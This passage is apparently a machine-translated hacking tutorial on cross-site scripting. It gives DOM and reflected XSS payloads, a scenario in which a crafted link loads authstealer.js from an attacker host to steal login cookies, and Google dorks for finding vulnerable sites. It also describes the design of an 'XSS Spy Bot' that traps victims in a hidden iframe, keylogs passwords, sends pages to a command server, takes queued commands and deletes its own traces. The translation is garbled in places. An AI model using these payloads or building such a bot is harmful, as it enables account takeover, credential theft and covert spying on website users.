način:</p><p>Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)</script>; </p><p>Stranica sada izgleda ovako:</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x06-4.jpg.pagespeed.ic.7nnJOHKoux.jpg' width="100%" loading=lazy loading=lazy></p> <p>Ali hajde da pogledamo HTML izvor:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x07-2.jpg.pagespeed.ic.5mMwWD0W90.jpg' width="100%" loading=lazy loading=lazy></p> <p>Ništa se tu nije promijenilo. Ovo je ono što sam rekao, moramo pogledati DOM strukturu dokumenta kako bismo identificirali zlonamjerni kod:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x08-3.jpg.pagespeed.ic.RVBIMU0n3H.jpg' width="100%" loading=lazy loading=lazy></p> <p>Evo radnog prototipa XSS-a, za pravi napad nam je potreban složeniji teret, što je nemoguće zbog činjenice da aplikacija prestaje čitati odmah nakon tačke i zareze, i nešto poput <b>upozorenje (1); upozorenje (2)</b> više nije moguće. Međutim, zahvaljujući <b>pobjeći ()</b> u vraćenim podacima možemo koristiti korisni teret kao što je ovaj:</p><p>Http: //localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)%3balert(2)</script>; </p><p>Gdje smo zamijenili simbol <b>; </b> URI kodiranom ekvivalentu!</p> <p>Sada možemo napisati zlonamjerni JavaScript korisni teret i sastaviti vezu za slanje žrtvi, kao što se radi za standardno netrajno skriptiranje na više lokacija.</p> <h2>XSS Auditor <br></h2> <p>U Google Chrome-u (kao i u Operi, koja sada koristi Google Chrome motor), dočekalo me ovakvo iznenađenje:</p> <blockquote> <p>dom_xss.html: 30 XSS revizor je odbio da izvrši skriptu u upozorenju "http: //localhost/tests/XSS/dom_xss.html#input=token ‹script› (1)</script>; "jer je njegov izvorni kod pronađen unutar zahtjeva. Revizor je bio omogućen jer server nije poslao ni "X-XSS-Protection" ni "Content-Security-Policy" zaglavlje.</p> </blockquote> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/x09-2.jpg.pagespeed.ic.gM4b2zjNrR.jpg' width="100%" loading=lazy loading=lazy></p> <p>One. sada postoji XSS revizor u pretraživaču koji će pokušati spriječiti XSS. Firefox još nema ovu funkciju, ali pretpostavljam da je to pitanje vremena. Ako je implementacija u pretraživačima uspješna, onda možemo govoriti o značajnoj poteškoći u korištenju XSS-a.</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x10-3.jpg.pagespeed.ic.YAGfPEUxeH.jpg' width="100%" loading=lazy loading=lazy></p> <p>Korisno je zapamtiti da moderni pretraživači poduzimaju korake da ograniče iskorištavanje problema kao što su nestabilni XSS i XSS zasnovani na DOM-u. Ovo također treba imati na umu kada testirate web stranice pomoću pretraživača - može se ispostaviti da je web aplikacija ranjiva, ali ne vidite iskačući prozor za potvrdu samo zato što ga pretraživač blokira.</p> <h2>Primjeri eksploatacije XSS-a <br></h2> <p>Napadači koji namjeravaju da iskoriste ranjivosti skriptiranja na više lokacija moraju pristupiti svakoj klasi ranjivosti različito. Vektori napada za svaku klasu su opisani ovdje.</p> <p>Sa XSS ranjivostima, napadi mogu koristiti BeEF, koji proširuje napad sa web stranice na lokalno korisničko okruženje.</p> <p><b>Primjer nestabilnog XSS napada</b></p> <p>1. Alice često posjećuje određenu web stranicu koju Bob hostuje. Bobova web stranica omogućava Alice da se prijavi s korisničkim imenom/lozinkom i pohrani osjetljive podatke kao što su informacije o plaćanju. Kada se korisnik prijavi, pretraživač sprema autorizacijske kolačiće, koji izgledaju kao besmisleni znakovi, tj. oba računara (klijent i server) pamte da je bila prijavljena.</p> <p>2. Malorie napominje da Bobova web stranica sadrži promjenjivu XSS ranjivost:</p> <p>2.1 Prilikom posjete stranici za pretraživanje, ona unosi niz za pretraživanje i klikne na dugme za slanje, ako nema rezultata, stranica prikazuje uneseni niz za pretragu, nakon čega slijede riječi "nije pronađeno" i url izgleda kao <b>http://bobssite.org?q= njen upit za pretragu</b></p> <p>2.2 Sa normalnim pojmom za pretraživanje kao što je “ <b>kučići</b>"Stranica se samo prikazuje" <b>kučići</b> nije pronađeno "i url http://bobssite.org?q= <b>kučići</b>, što je normalno ponašanje.</p> <p>2.3 Međutim, kada se nenormalan upit za pretraživanje pošalje na pretragu kao <b><script type="text/javascript">alert("xss");</script> </b>:</p> <p>2.3.1 Pojavljuje se poruka upozorenja (koja kaže "xss").</p> <p>2.3.2 Prikazi stranica <b><script type="text/javascript">alert("xss");</script> nije pronađeno</b> zajedno s porukom o grešci s tekstom "xss".</p> <p>2.3.3 upotrebljivi URL <b>http://bobssite.org?q=<script%20type="text/javascript">alert("xss");</script> </b></p> <p>3. Mallory konstruiše URL da iskoristi ranjivost:</p> <p>3.1 Ona pravi URL <b>http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script> </b>... Ona može odabrati pretvaranje ASCII znakova u heksadecimalni format kao što je <b>http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E</b> kako biste spriječili ljude da odmah dešifriraju zlonamjerni URL.</p> <p>3.2 Ona šalje e-mail nekom nesuđenom članu Bobove stranice govoreći: "Pogledajte cool pse."</p> <p>4. Alice prima pismo. Ona voli pse i klikne na link. Ode na Bobovu stranicu u pretrazi, ne pronalazi nista, prikazuje "no dogs found", a u sredini se pokreće tag sa skriptom (na ekranu je nevidljiv), učitava i izvršava Malloryjev authstealer.js program (pokreće XSS napad). Alice zaboravlja na to.</p> <p>5. Program authstealer.js radi u Aliceinom pretraživaču kao da potiče sa Bobove web stranice. Ona grabi kopiju Aliceinih autorizacijskih kolačića i šalje ih na Malorien server, gdje ih Malorie preuzima.</p> <p>7. Sada kada je Malorie unutra, odlazi na odjeljak za plaćanje na web stranici, traži gore i krade kopiju Aliceine kreditne kartice. Zatim ode i promijeni lozinku, tj. sada Alice više ne može ni da uđe.</p> <p>8. Ona odlučuje napraviti sljedeći korak i tako konstruiranu vezu šalje samom Bobu i tako dobiva administrativne privilegije Bobove stranice.</p> <p><b>Trajni XSS napad</b></p> <ol><li>Malorie ima nalog na Bobovoj web stranici.</li> <li>Malorie primjećuje da Bobova web stranica sadrži trajnu XSS ranjivost. Ako odete u novi odjeljak, objavite komentar, on prikazuje sve što je upisano u njega. Ali ako tekst komentara sadrži HTML oznake, te oznake će biti prikazane takve kakve jesu, a sve oznake skripte će se pokrenuti.</li> <li>Malorie čita članak u odjeljku Vijesti i piše komentar u odjeljku Komentari. Ona ubacuje tekst u komentar:</li> <li>U ovoj priči su mi se jako svidjeli psi. Tako su fini! <script src="http://mallorysevilsite.com/authstealer.js"></li> <li>Kada Alice (ili bilo ko drugi) učita stranicu s ovim komentarom, Maloriein skript tag se pokreće i krade Aliceine autorizacijske kolačiće, šalje ga Malorieinom tajnom serveru na prikupljanje.</li> <li>Malorie sada može presresti Aliceinu sesiju i oponašati Alice.</li> </ol><h2>Pronađite web lokacije osjetljive na XSS <br></h2> <p><b>XSS ceste</b></p> <p>Prvi korak je odabir lokacija na kojima ćemo izvršiti XSS napade. Web stranice se mogu pretraživati koristeći Google Dorks. Evo nekoliko ovih glupana, koje možete kopirati i zalijepiti u Google pretragu:</p> <ul><li>inurl: search.php?q =</li> <li>inurl: .php?q =</li> <li>inurl: search.php</li> <li>inurl: .php? search =</li> </ul><p>Pred nama će se otvoriti lista lokacija. Morate otvoriti web lokaciju i na njoj pronaći polja za unos, kao što su formular za povratne informacije, obrazac za unos, pretraga stranice itd.</p> <p>Odmah napominjem da je gotovo beskorisno tražiti ranjivosti u popularnim automatski ažuriranim web aplikacijama. Klasičan primjer takve aplikacije je WordPress. U stvari, postoje ranjivosti u WordPressu, a posebno u njegovim dodacima. Štoviše, postoje mnoge stranice koje ne ažuriraju niti WordPress engine (zbog činjenice da je webmaster napravio neke svoje promjene u izvornom kodu), niti dodatke i teme (u pravilu su to piratski dodaci i teme ). Ali ako čitate ovaj odjeljak i naučite nešto novo iz njega, onda WordPress još nije za vas... Definitivno ćemo mu se vratiti kasnije.</p> <p>Najbolje mete su razne prilagođene mašine i skripte.</p> <p>Možete odabrati kao nosivost umetanja</p><p> <script>alert(1)</script> </p><p>Obratite pažnju na to u koje HTML oznake spada vaš umetnuti kod. Evo primjera tipičnog polja za unos ( <b>unos</b>):</p><p> <input type="text" class="ui-input query" name="q" value="jastučnica"/><script>alert(1)</script><input value="" /> </p><p>Naš teret će ići tamo gde je sada reč "jastučnica". One. pretvoriti u vrijednost oznake <b>unos</b>... To možemo izbjeći zatvaranjem dvostrukog navodnika, a zatim i same oznake <b>"/> </b></p> <p> "/><script>alert(1)</script> </p><p>Hajde da probamo za web stranicu:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/101.jpg' width="100%" loading=lazy loading=lazy></p> <p>Odlično, ranjivost postoji</p> <p><img src='https://i0.wp.com/hackware.ru/wp-content/uploads/2016/06/102.jpg' width="100%" loading=lazy loading=lazy></p> <h2>Programi za pronalaženje i skeniranje XSS ranjivosti <br></h2> <p>Vjerovatno svi skeneri web aplikacija imaju ugrađeni skener XSS ranjivosti. Ova tema nije sveobuhvatna, bolje je upoznati se sa svakim takvim skenerom zasebno.</p> <p>Svima je odavno poznato da najčešće, koristeći XSS, napadač pokušava poslati kolačić žrtvi, pročitati CSRF tokene, izvršiti phishing napad (kreiranjem lažnog obrasca za prijavu), izvršiti neku radnju u ime nekog user, i još neki slični napadi (možda to nisu sve mogućnosti, ali su to sve najpopularniji koji su mi trenutno poznati).</p><p>Svrha ove metode je praćenje stranica u ime korisnika na koje odlazi na napadnutom sajtu, kao i praćenje njegovih pritisaka na tastere (možete i pomeranje i klikove mišem, ali za mene će to biti nepotrebno, ne baš korisno info, u većini slučajeva sigurno)... <br>Sada za maksimalnu korist - vjerujem da bi algoritam bio ovakav:</p><ul><li>čitanje i slanje kolačića;</li><li>pročitajte i pošaljite ostale informacije (IP-adresa, instalirani dodaci, verzija i tip pretraživača, podrška za flash, podrška za silverlight, itd.) [opcionalno]</li><li>dobijamo informacije o internoj mreži, probijamo ruter [opciono]</li><li>čitanje i slanje različitih tokena [opcionalno];</li><li>implementiramo phishing [opcionalno];</li><li>uradite nešto sa "rukama" "korisnika [opciono];</li><li>nastavljamo da ga špijuniramo i izvlačimo informacije sve dok ne zatvori karticu ili ne napusti stranicu;</li> </ul><p>Sve opcione stavke na listi IMHO treba izvoditi ovisno o situaciji i konkretnim prioritetima za svrhe koje treba postići korištenjem XSS-a, ponekad se mogu međusobno ometati (ako ih pokušate kombinirati, tačnije, jednu po jednu ) i povećavaju vjerovatnoću neuspjeha eksploatacije XSS-a. <br>Ali prvu i posljednju tačku uvijek treba pratiti, u svakom slučaju, zapravo, glavni dio članka će se odnositi na posljednju tačku sa ove liste.</p><h3><u><b>Približavamo se cilju.</b> </u></h3><p>Počeću izdaleka: putem JavaScripta moguće je promijeniti putanju u adresnoj traci bez ponovnog učitavanja stranice. Na primjer, ako je korisnik učitao stranicu na</p><br>Zatim će u adresnoj traci sadržaj postati sljedeći (bez ponovnog učitavanja stranice): <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td><td class="crayon-code"><p>http: //site.com/new-url/</p> </td> </tr></table><br>Inače, ova funkcija je ponekad prilično korisna kada je potrebno sakriti od korisnika (ili pažljivije kategorije korisnika - admina) URL nakon što klikne na link koji sadrži Reflected XSS, kako bi kasnije, nakon učitavanja stranice , gledajući u adresnu traku, ništa nije našao. <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td><td class="crayon-code"><p>http: <span>//site.com/search.php?q=123<script> document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table><table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td><td class="crayon-code"><p>http: <span>//site.com/search.php?q=123<script> window . history . pushState ("" , "" , "/" ) ; document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table><br>uskratićemo mu ovu priliku. <p>Ali ova tehnika ima još zanimljivije i moćnije upotrebe. Simuliraćemo boravak korisnika na sajtu nakon klika na link, zapravo, on će ostati na istoj stranici sve vreme, a u ovom trenutku će raditi skripta treće strane koja izvlači i šalje informacije napadaču. dakle, <b><u>XSS će raditi sve dok korisnik klikne na link na ovoj domeni</u> </b>.</p><h3><u><b>Mi definišemo ideju.</b> </u></h3><p>Generalni princip rada je sljedeći: kada korisnik posjeti stranicu sa XSS-om, skripta kreira iframe sa istom adresom kao stranica i "zalijepi" ga u prvi plan, korisnik stiče utisak da se stranica normalno učitava, jer se iframe može vidjeti samo u kodnim stranicama.</p><p>A pomoćna skripta kontroliše logiku špijunskog bota, odnosno prati kada se adresa promeni u okviru da bi je promenila u adresnoj traci, ali da li postoji druga domena u novopromenjenoj adresi okvira, onda je možete otvoriti na novoj vlkadki, ili ćete morati ponovo učitati stranicu da se ne izgori. <br>Dakle, da bi XSS u ovom trenutku prestao da se izvršava, korisnik mora ili ručno osvježiti stranicu (ako je XSS Reflected i prenet POST metodom, u drugim slučajevima ažuriranje neće sačuvati, a usput, neki pretraživači sada može ponovo poslati POST zahtjev prilikom ažuriranja stranice) ili zatvoriti karticu ili se prebaciti na drugu domenu (iako u ovom slučaju još uvijek možete izbjeći gubitak kontrole).</p><p>Ako ode na poddomen napadnutog domena, tada će izbor napadača, odnosno XSS raditi, ali je mala šansa da će korisnik vidjeti neslaganje između adrese. Mislim da je ovdje u skladu sa situacijom, na primjer, ako je napadnuta domena google.ru, korisnik otišao na Googleov cloud fajl servis, koji obično leži u poddomeni drive.google.ru, tada je vjerovatnoća da će primijetiti uhvatiti kada gledate u adresnu traku je dosta visoka, <u>ako je često koristio ovu uslugu</u>... U suprotnom, možete riskirati. Ali moramo uzeti u obzir da više nećemo moći čitati njegove podatke iz okvira s poddomenom, jer Politika unakrsnog porijekla to neće dozvoliti. Ali možemo se mirno popeti na glavnu domenu u njeno ime u skrivenom načinu (u nastavku će biti više o tome detaljnije).</p><p>Samo ova metoda ima ograničenja, naime - neće raditi ako postoji zaglavlje u odgovorima web servera stranice <b>X-Frame-Opcije</b> sa značenjem <b>DENY</b>... Ali lično sam takve stranice sreo bukvalno par puta, sada čak i pola <b>SAMEORIGIN</b> nije izloženo, a kamoli potpuno ograničenje kroz <i>DENY</i>.</p><h3><u><b>Analizirajući ideju.</b> </u></h3><p>Sada su se mnogi vjerovatno sjetili tako divne stvari kao što je BeEF, koji također ima puno zanimljivih stvari. Tako, inače, postoji i opcija za prinudno preusmjeravanje korisnika u okviru, ali se adresa u adresnoj traci ne mijenja, što može brzo zapaliti sto i ova opcija služi malo za druge svrhe. <br>Općenito, BeEF'e ima gotovo sve što vam treba, pa čak i puno dodatnih funkcija, ali osobno sam želio dodatnu funkcionalnost, i to:</p><ul><li>mogućnost praćenja koda stranica koje su dostupne napadnutom korisniku u realnom vremenu;</li><li>mogućnost gledanja svega što ukuca na tom sajtu (od login-a i lozinke, do hotkey-a i poruka), odnosno keylogger-a na JS-u;</li><li>mogućnost davanja JS komandi vašem botu u realnom vremenu, nakon pregleda koda primljenih stranica;</li><li>mogućnost prepuštanja komandi botu lokalno, tako da ih on "pokupi" i izvrši bez našeg direktnog učešća;</li><li>manja vjerovatnoća da se bot opeče, ili sposobnost bota da se „sakrije“ od znatiželjnih očiju;</li> </ul><p>Kao što je gore pomenuto - odlučio sam da pozajmim od BeEF-a cool ideju o redu za izvršavanje komandi. Na primjer, analizirali smo stranice koje je bot ispustio kada se privilegirani korisnik popeo na njegovu kontrolnu ploču sa pohranjenim XSS-om, ostavljamo komandu botu - JS kod, kao sljedeći put kada korisnik uđe, pritisnite ovo dugme, napišite ovo vrijednost ovdje, itd. kada ovaj korisnik sljedeći put posjeti stranicu, bot čita komande i izvršava ih, a mi uopće ne moramo biti na njegovom čelu - to je vrlo zgodno.</p><p>U osnovi, takav bot je, naravno, dizajniran za statusne korisnike nekih sajtova koji imaju dodatne "poluge" upravljanja sadržajem, druge korisnike itd. Iz zahtjeva za funkcionalnošću jasno je da se ne može bez serverske strane.</p><h3><u><b>Idemo implementirati ideju.</b> </u></h3><p>U principu, možete preskočiti ovaj dio članka, jer on jednostavno opisuje proces implementacije željenog bota i neke njegove detalje, u slučaju da neko želi da ga prepravi ili doradi za sebe. Iako će bot na početku koda imati varijable kroz koje možete postaviti neka podešavanja. <br>Prvo, algoritam akcija bota od trenutka učitavanja:</p><p>1) Provjera prisustva zaglavlja <i>X-Frame-Opcije: DENY</i>(ako postoji, namotajte štapove za pecanje); <br>2) Ugradnja okvira i postavljanje svih komponenti bota; <br>3) Uklanjanje skripte i svih tragova u HTML kodu; <br>4) Uspostavljanje kontakta sa serverskom stranom i početak slanja podataka, reagovanje na odgovore (primanje komandi sa servera);</p><p>Nisam u potpunosti iznio prvu tačku, odnosno bot provjerava samo prvu stranicu i korijensko zaglavlje. Činjenica je da se ova zaglavlja obično ugrađuju od strane web servera za sve stranice odjednom i vrlo je rijetko da se sve radi "ručno" za posebnu stranicu. I sam ovaj naslov je prilično rijedak. Pa o drugom i trećem nema šta posebno da se kaže, sve će biti niže.</p><p>Postoji relativno važna stvar da prije dodavanja koda bot skripte u svoj kod, morate se odmah riješiti XSS znakova u adresnoj traci (od JS koda), jer to smanjuje šanse za otkrivanje i, što je najvažnije, sprečava rekurziju koja se javlja kada se adresa doda u okvir sa istim XSS kodom, koji zauzvrat kreira drugi okvir sa samim sobom, i tako dalje.</p><p>Ali za svaki slučaj, kod bota implementira mogućnost otkrivanja takve rekurzije okvira i sprječavanja pri prvom pokušaju dodavanja okvira u već kreirani, ali je bolje ne oslanjati se samo na njega, već dodatno izbrisati kod prije učitavanja bot koda. Iako još nisam naišao na probleme.</p><p>Funkcija provjere ažuriranja okvira. Pokušao sam na nekoliko načina da ekonomično riješim ovaj problem tako što sam okačio rukovaoce događajima <i>contentWindow</i> ili <i>contentDocument</i>, ali ništa nije uspjelo, pa sam morao napisati funkciju koja će provjeriti adresu okvira i uporediti je sa prethodno sačuvanom i na osnovu toga odlučiti da li se okvir ažurira (da li se adresa promijenila) i onda rekurzivno nazvao sebe. <br><br>Učestalost takvih provjera u sekundi kontrolira se promjenjivom <i>kašnjenje</i>, koji je naveden na početku datoteke koda bota. Ali kasnije, nakon što sam ga već napisao, našao sam efikasnije rješenje - upotrijebite jednostavno rješenje i spustite se <i>onload</i> po kadru, pa sam ostavio tu funkciju, ali sam je prokomentirao, u slučaju da se kasnije pokaže traženijom.</p><h3><u><b>Slanje HTML koda stranice.</b> </u></h3><p>Ovdje je shema prilično jednostavna - nakon svakog ponovnog učitavanja okvira (uključujući prvo učitavanje), bot šalje serveru cijeli HTML kod stranice zajedno sa njenom trenutnom adresom, tako da kasnije možete razlikovati pripada li kod potrebne stranice.</p><p>Server implementira logiku pohranjivanja stranica - server za svaki domen kreira folder sa imenom ovog domena i tamo spremamo sve podatke. Kodovi stranica se spremaju i stalno ažuriraju na najnovije verzije, ali svaki novi dan se kreira nova kopija stranice tako da možete kontrolirati historiju verzija ako je potrebno. To jest, za <i>/news.php</i> 1. septembra status će biti ažuriran, a 2. septembra će biti kreirana njegova kopija, relevantna samo za taj dan i tako svaki dan iznova (ako korisnik posjećuje ovu stranicu svaki dan). Ime stranice sastoji se od datuma i putanje do ove stranice u odnosu na korijen stranice (tj. bez domene).</p><h3><u><b>Keylogger u JavaScriptu.</b> </u></h3><p>Ideju su već implementirali neki entuzijasti, ali za mene njihov razvoj nije odgovarao, makar samo zato što je većina njih bila prilično jednostavna, odnosno otkrili su kod pritisnute tipke i kroz <i>String.fromCharCode</i> prevedeno u simbole. Ali ova metoda ima brojne nedostatke - kontrolne tipke kao što su shift, kontrola, razmak itd., ne prevode se u bilo koji oblik (često samo prazan znak), interakcija alfanumeričkih tipki sa tipkom shift se pogrešno evidentira, jer ovo se mora implementirati programski, a takođe, svi pritisnuti tasteri se prikazuju velikim slovima, što se takođe može programski ispraviti.</p><p>Kao rezultat, dobili smo keylogger koji je ispravno detektovao sve tipke brojeva, slova i osnovnih znakova, radio na oba izgleda, reagirao na promjenu i bilježio sve glavne specijalne tipke. Istina, neki znakovi (u gornjem dijelu digitalnog reda koji se štampaju kada se pritisne pomak i broj) na nekim mašinama mogu se razlikovati, jer su implementirani po glavnom standardu, koji neke kompanije nekima mijenjaju. <br>Svaki dio pritisnutih znakova klijent zadržava sve dok tekstualni element ne izgubi fokus. Nadalje, ovaj dio se šalje na server, gdje se pohranjuje u tekstualnu datoteku, koja će se također kreirati svaki dan sa novom kopijom, tako da nema rasta u velike veličine i da možete brzo pronaći šta je korisnik kucao u takvom trenutku. <br>Pored samih ključeva, serveru se sa svakim dijelom šalje informacija o elementu u koji je upisan tekst (tj. <i><input>, <textarea>[ </i> ili neke <i><body> </i> kada je korisnik koristio prečice), osim naziva elementa, šalju se i njegovi osnovni podaci (id, naziv, klasa - ako postoje) kako bi se onda lako mogao pronaći u kodu. I naravno, zapisuje se adresa stranice na kojoj je bio set i otprilike vrijeme ovog skupa. Generalno, informacija o korisniku koji kuca po tastaturi šalje se sasvim dovoljno za njihovu kasniju analizu.</p><h3><u><b>Komandujte svojim botom.</b> </u></h3><p>Ovaj proces može obaviti napadač ili na strani gdje je pokrenut serverski dio bota, pa čak i daljinski. Nakon pokretanja serverske skripte, pokreće se samopisni minijaturni web server koji opslužuje zahtjeve bota i njegovog kontrolera koji radi preko web sučelja. Odnosno, nakon pokretanja, web server izdaje vezu, klikom na koju možete početi davati komande botu.</p><p>O ovoj kontrolnoj tabli. Prvo je bilo potrebno ograničiti ga lozinkom (put i malo ljudi će znati za pokrenut servis na tom i tom portu ili za adresu na kojoj se morate prijaviti da biste koristili ovaj servis), tako da kada prvo unesite server će tražiti lozinku koja je navedena u adresnoj traci (primjer će biti dat), originalna lozinka je pohranjena u <i>password.txt</i> to se može promijeniti. Nakon prve posjete, web server će naložiti pretraživaču da sačuva lozinku u kolačić, tako da više ne morate brinuti o tome.</p><p>Na stranici za slanje komandi samom botu nalazi se i informacija o stanju bota - da li je trenutno online ili offline, te par postavki od kojih je prvo host, tj. IP adresa ili domena stranice na koju će se komande slati botu. Ovo je dizajnirano u slučaju da će nekoliko lokacija sadržavati ovog bota kako bi se mogli identificirati. Na serveru su i za ovaj slučaj svi podaci podijeljeni u foldere sa nazivima domena. <br>Slijedi prozor u kojem možete pisati komande botu u JS-u, te opcija koja postavlja gdje će se ovaj JS kod izvršavati, na glavnom prozoru gdje bot sjedi ili u okviru - ovo je urađeno radi pogodnosti, za svaki slučaj .</p><p>Ako bot nije onlajn, server jednostavno sprema komande i kasnije, kada bot bude onlajn, odnosno korisnik ponovo poseti stranicu sa njim ili prati link napadača - ove komande će se izvršiti. <br>Ovo je vrlo zgodno ako je prilikom prvog istraživanja bot bacio sve stranice koje je korisnik posjetio (na primjer, lični nalog), proučivši kod od kojeg smo napravili komande u JS-u, da bi kasnije bot kliknuo na linkovima koji su nam potrebni unesite potrebne podatke, prikažite potrebne slike itd., što će pomoći u ostvarenju zacrtanog cilja.</p><p>Ili možete direktno u realnom vremenu, brzo pogledati sadržaj stranica kroz kod i dati botu komande da pošalje kod drugih stranica, ode na drugu adresu itd. I sve će se to raditi "iza ekrana" od strane korisnika koji će mirno surfati na lokaciji kroz okvir.</p><p>Radi vaše udobnosti, najčešće korišćene instrukcije možete formirati u čitave funkcije u JS-u, koje zatim unose botove u izvorni fajl ( <i>xsb.js</i>, struktura datoteke će biti razmotrena u nastavku) i upotreba. Ili koristite one od funkcija koje su ugrađene u bot, iako postoji samo osnova i nema ništa novo, ali na primjer, možete koristiti funkciju slanja koda stranice u bilo kojem trenutku, a ne kada se okvir ponovo učitava . Možete napisati funkciju koja će otvarati veze koje su joj proslijeđene u novim okvirima u pozadini kako bi se u ime korisnika pregledao sadržaj nekoliko stranica (i upravljao ovim sadržajem njegovim virtualnim rukama).</p><h3><u><b>Uklanjanje vlastitog koda.</b> </u></h3><p>Pa, posljednja karakteristika je implementirana prilično jednostavno (može se onemogućiti postavljanjem željene varijable u datoteci, oni su komentarisani). Skripta se, nakon postavljanja i vješanja svih rukovatelja događaja, kreiranja svih varijabli i funkcija, briše sama</p><p>Uostalom, svi podaci su već učitani u RAM preko pretraživača, tako da nema razloga za brigu, ali ovo je u teoriji, možda će kasnije biti problema koje nisam uzeo u obzir, pa sam dao varijablu , koji se po potrebi može onemogućiti.</p><p>Nakon uklanjanja svih skripti, biće izuzetno teško uočiti XSS, jer prisustvo okvira ne govori o tome sasvim indirektno, a sam kod se može pronaći samo u logovima istorije mrežnog saobraćaja pretraživača (koje ne vodi podrazumevano u mnogim pretraživačima ako panel za programere nije otvoren) ...</p><h3><u><b>Serverski dio.</b> </u></h3><p>Za lakši i praktičniji način pokretanja bota, odlučeno je da napišem svoj mali web server na soketima koji će opsluživati bota, obezbjeđivati sve operacije za primanje i plasiranje poslatih podataka, prenositi poruke između napadača i bota, i kreirati web interfejs za komandovanje napadačem... <br>Server je napisan na python-u, pokušao sam da koristim samo standardne biblioteke tako da nisam morao ništa da instaliram prije pokretanja. Takođe, server sam uređuje neke podatke u skriptama, odnosno u botovoj JS skripti, ne treba da postavljate adresu komandnog servera, sam web server će tamo staviti potrebnu kada se pokrene. U konfiguraciji servera postoji samo jedan parametar - port na kojem će se pokrenuti (podrazumevano 8000). <br>Nakon pokretanja, server će prikazati sve potrebne podatke - link do JS skripte, koji će morati da se ubaci, link do komandnog panela, ili, tačnije, veze do eksternih i lokalnih adresa, radi pogodnosti.</p><h3><u><b>Šema rada sa botom.</b> </u></h3><p>Pokrećemo server na nekom nepotraženom portu i možete poslati link sa bot skriptom, a onda će vam svi koji ga budu pratili poslati podatke koje će server sačuvati u bilo koje doba dana. Tada ih možete jednostavno pogledati ako postoji potreba da prepustite tim botu i nastavite da se bavite svojim poslom.</p><h3><u><b>Struktura fajla.</b> </u></h3><p>Fascikla sadrži sljedeće fajlove:</p><ul><li><b>xsb.py</b>- glavni fajl koji implementira serversku stranu, da ga bot pokrene, a zatim samo koristi link koji nudi;</li><li><b>xsb.js</b>- ovdje je pohranjen JS kod bota, link do kojeg izdaje server, na njegovom početku su deklarirane konfiguracijske varijable koje možete promijeniti po vašem nahođenju (neke, odnosno host i port, server će kasnije izložiti, ne morate da brinete);</li><li><b>panel.html</b>- odavde server preuzima kod za bot kontrolnu tablu, možete podesiti interfejs po svom nahođenju;</li><li><b>password.txt</b>- ovdje je pohranjena lozinka sa kontrolne table, koja se može mijenjati;</li><li><b>savedData</b>- ovo je direktorij u kojem će se kreirati mape s domenama web-mjesta, u kojem će se pohranjivati sve informacije.</li> </ul><p>Još jednom to napominjem u dosijeu <i>xsb.js</i> možete dodati vlastite funkcije, koje se zatim pozivaju kroz panel, bez pisanja velikih dijelova koda;</p><h3><u><b>Mala analiza rezultata.</b> </u></h3><p>Nakon što sam napisao svoj izmišljeni način držanja korisnika na stranici sa XSS-om kroz okvire (pa, kao izmišljen - ja sam ga lično otkrio, sasvim je moguće da je neko drugi "izmislio" istu tehniku za sebe, ili generalno je već negdje u javnosti zablistao, jer je sada prilično teško razviti nešto stvarno novo, a po pravilu, nakon nekog vremena otkrijete da je "već bilo u Simpsonovima") Počeo sam detaljnije da ulazim u BeEF i pročitajte njen wiki. Tada sam otkrio da je tamo implementirana još jedna tehnika kako bi se postigao isti cilj - produženje vremena korisnika na stranici pomoću izvršnog XSS-a (koji je tamo pozvan <i>čovjek u pretraživaču</i>). A implementirano je ovako: svi linkovi na početnoj stranici su se mijenjali na način da kada kliknete na bilo koju od njih, skripta nije ponovo učitala stranicu, već je preko Ajaxa poslala zahtjev serveru i ubacila primljene podatke u odgovor, odnosno može se reći da ga veštački ažurira, što se takođe gotovo nije razlikovalo od redovnog osvežavanja.</p><p>Stoga nisam bio prvi koji je implementirao ovu ideju (čak i ako su metode bile različite). Ali obje ove metode imaju svoje nedostatke:</p><p>Način otpremanja putem <iframe>ne radi ako u odgovoru postoji zaglavlje <i>X-Frame-Opcije: DENY</i>, ali inače pluta kao običan prozor pretraživača;</p><p>Metod ajax uvijek radi ako ga pretraživač podržava (sada ga podržavaju svi glavni pretraživači), ali sa novim Web 2.0 standardom, sve više i više tranzicija se pokreće prilagođenim događajima bilo kojeg elementa putem JS-a. Jednom sam otišao na Google AdWords i odlučio da vidim kako njihov HTML i JS interaguju tamo, jer su svi moji pauci bili izuzetno loši u kreiranju mape ovog servisa. I tiho sam zajebao cijelu večer, koliko to nije bilo poznato, kada su tekstualni elementi bili dugmad i prekidači i klizači i ono na čemu nisu prikazani, a svaki je imao po 30-ak handlera za različite događaje.</p><p>Odnosno, na fensi web-stranici, dugme za tranziciju (subjektivno veza) će biti implementirano putem regularne oznake <i><span> </i>, koji je napunjen stilovima i na koji su obješeni rukovatelji događaja, od kojih je jedan, na primjer, <i>onclick preusmjerava korisnika na drugu stranicu. Postoje i standardni elementi poput [i] <input type=button> </i> ili sebe <i><button> </i> i tako dalje, koji su zapravo i linkovi ka drugim stranicama, ali na koje BeEF neće odgovoriti i stranica jednostavno neće biti ažurirana kada se klikne većina dugmadi i drugih elemenata. Što bi moglo potaknuti korisnika da osvježi stranicu ili ponovo posjeti "s druge strane", što ubija našu aktivnu XSS sesiju.</p><p>Radi kratkoće imenovanja fajlova, nazvao sam ga Xss Spy Bot.</p><p>P.S. <br>Za pisanje cijele stvari trebalo je nešto više od mjesec dana zbog periodičnog nedostatka vremena i stalnih smetnji. Također zbog toga, kvalitet koda i vjerovatnoća da ćete naići na neku vrstu greške je prilično visoka. Zato vas molim 